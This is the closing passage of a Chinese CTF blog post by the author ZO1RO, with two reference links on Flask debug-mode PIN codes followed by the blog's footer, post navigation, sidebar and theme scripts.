<p><a href="https://www.cnblogs.com/shengulong/p/8072318.html" target="_blank" rel="noopener">flask的debug模式下，网页输入pin码进行调试</a></p>
<p><a href="https://zhuanlan.zhihu.com/p/32336971" target="_blank" rel="noopener">Flask debug 模式 PIN 码生成机制安全性研究笔记</a></p>

      
    </div>

    

    
    
    

    
      <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束 <i class="fa fa-heart"></i> 感谢阅读-------------</div>

    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag">📖ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/09/14/py-sandbox/" rel="next" title="Python沙盒逃逸">
                <i class="fa fa-chevron-left"></i> Python沙盒逃逸
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/15/2018pico1/" rel="prev" title="2018picoctf复现I">
                2018picoctf复现I <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      

      <div class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">ZO1RO</p>
              <div class="site-description motion-element" itemprop="description">永远做好最坏的打算</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">17</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/ZO1RO" title="GitHub &rarr; https://github.com/ZO1RO" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="mailto:em8xcm93ZWJAMTYzLmNvbQo=" title="E-Mail &rarr; mailto:em8xcm93ZWJAMTYzLmNvbQo=" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://impakho.com/" title="https://impakho.com/" rel="noopener" target="_blank">偶像pakho师傅</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://imlonghao.com/" title="https://imlonghao.com/" rel="noopener" target="_blank">偶像longhao师傅</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wulidecade.cn/" title="https://wulidecade.cn/" rel="noopener" target="_blank">Decade</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://mang0.me/" title="http://mang0.me/" rel="noopener" target="_blank">Mang0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.singll.cc/" title="https://blog.singll.cc/" rel="noopener" target="_blank">Singll</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sherlocz.github.io/" title="https://sherlocz.github.io/" rel="noopener" target="_blank">sher10ck</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://timeshu.github.io/" title="https://timeshu.github.io/" rel="noopener" target="_blank">Time</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ama666.cn/" title="https://ama666.cn/" rel="noopener" target="_blank">ama666</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://jgeek.cn/" title="https://jgeek.cn/" rel="noopener" target="_blank">\0x584A</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ZO1RO</span>

  

  
</div>









        








        
      </div>
    </footer>

    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.1"></script>

  <script src="/js/motion.js?v=7.1.1"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.1.1"></script>



  
  <script src="/js/scrollspy.js?v=7.1.1"></script>
<script src="/js/post-details.js?v=7.1.1"></script>



  


  <script src="/js/next-boot.js?v=7.1.1"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
